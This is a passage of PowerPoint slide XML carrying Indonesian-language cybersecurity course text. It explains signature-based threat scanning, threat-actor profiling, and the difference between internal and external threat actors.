              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sayangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Sifat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>motivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Internal/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Eksternal</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Internal/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perhatikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancamannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal/orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kecanggihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecanggihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
